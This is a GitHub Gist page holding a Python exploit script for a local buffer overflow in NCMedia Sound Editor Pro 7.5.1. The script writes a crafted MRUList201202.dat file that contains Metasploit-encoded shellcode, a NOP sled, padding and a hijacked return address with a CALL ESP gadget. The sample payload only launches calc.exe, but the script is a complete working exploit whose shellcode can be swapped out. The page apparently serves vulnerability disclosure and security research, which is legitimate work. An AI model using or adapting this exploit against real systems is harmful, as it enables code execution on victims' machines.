Created
September 25, 2012 14:36
-
-
Save whylovejp/3782307 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow | |
# Version: 7.5.1 | |
# Date: 2012-08-07 | |
# Author: Julien Ahrens | |
# Website: http://www.inshell.net | |
# Software Link: http://www.soundeditorpro.com/ | |
# Tested on: Windows XP SP3 Professional German | |
# Howto: Copy MRUList201202.dat to %appdata%\Sound Editor Pro\ --> Launch app --> Click on "File" Menu | |
from struct import pack | |
file="MRUList201202.dat" | |
# windows/exec CMD=calc.exe | |
# Encoder: x86/shikata_ga_nai | |
# powered by Metasploit | |
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0d\x0a' | |
shellcode = ("\xd9\xc7\xba\x2d\xdd\x15\x6d\xd9\x74\x24\xf4\x58\x29\xc9" + | |
"\xb1\x33\x31\x50\x17\x03\x50\x17\x83\xed\xd9\xf7\x98\x11" + | |
"\x09\x7e\x62\xe9\xca\xe1\xea\x0c\xfb\x33\x88\x45\xae\x83" + | |
"\xda\x0b\x43\x6f\x8e\xbf\xd0\x1d\x07\xb0\x51\xab\x71\xff" + | |
"\x62\x1d\xbe\x53\xa0\x3f\x42\xa9\xf5\x9f\x7b\x62\x08\xe1" + | |
"\xbc\x9e\xe3\xb3\x15\xd5\x56\x24\x11\xab\x6a\x45\xf5\xa0" + | |
"\xd3\x3d\x70\x76\xa7\xf7\x7b\xa6\x18\x83\x34\x5e\x12\xcb" + | |
"\xe4\x5f\xf7\x0f\xd8\x16\x7c\xfb\xaa\xa9\x54\x35\x52\x98" + | |
"\x98\x9a\x6d\x15\x15\xe2\xaa\x91\xc6\x91\xc0\xe2\x7b\xa2" + | |
"\x12\x99\xa7\x27\x87\x39\x23\x9f\x63\xb8\xe0\x46\xe7\xb6" + | |
"\x4d\x0c\xaf\xda\x50\xc1\xdb\xe6\xd9\xe4\x0b\x6f\x99\xc2" + | |
"\x8f\x34\x79\x6a\x89\x90\x2c\x93\xc9\x7c\x90\x31\x81\x6e" + | |
"\xc5\x40\xc8\xe4\x18\xc0\x76\x41\x1a\xda\x78\xe1\x73\xeb" + | |
"\xf3\x6e\x03\xf4\xd1\xcb\xfb\xbe\x78\x7d\x94\x66\xe9\x3c" + | |
"\xf9\x98\xc7\x02\x04\x1b\xe2\xfa\xf3\x03\x87\xff\xb8\x83" + | |
"\x7b\x8d\xd1\x61\x7c\x22\xd1\xa3\x1f\xa5\x41\x2f\xce\x40" + | |
"\xe2\xca\x0e") | |
junk1="\x41" * 12 | |
nopsled="\x90" * 20 | |
junk2="\x42" * (4108 - len(shellcode) - len(nopsled)) | |
eip=pack('<L',0x004d893e) # ADD ESP,404 # POP EDI # POP ESI # RETN from SoundEditorPro.exe | |
esp=pack('<L',0x7e8236d9) # CALL ESP from shell32.dll | |
poc=junk1 + esp + nopsled + shellcode + junk2 + eip | |
try: | |
print "[*] Creating exploit file...\n" | |
writeFile = open (file, "w") | |
writeFile.write( poc ) | |
writeFile.close() | |
print "[*] File successfully created!" | |
except: | |
print "[!] Error while creating file!" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment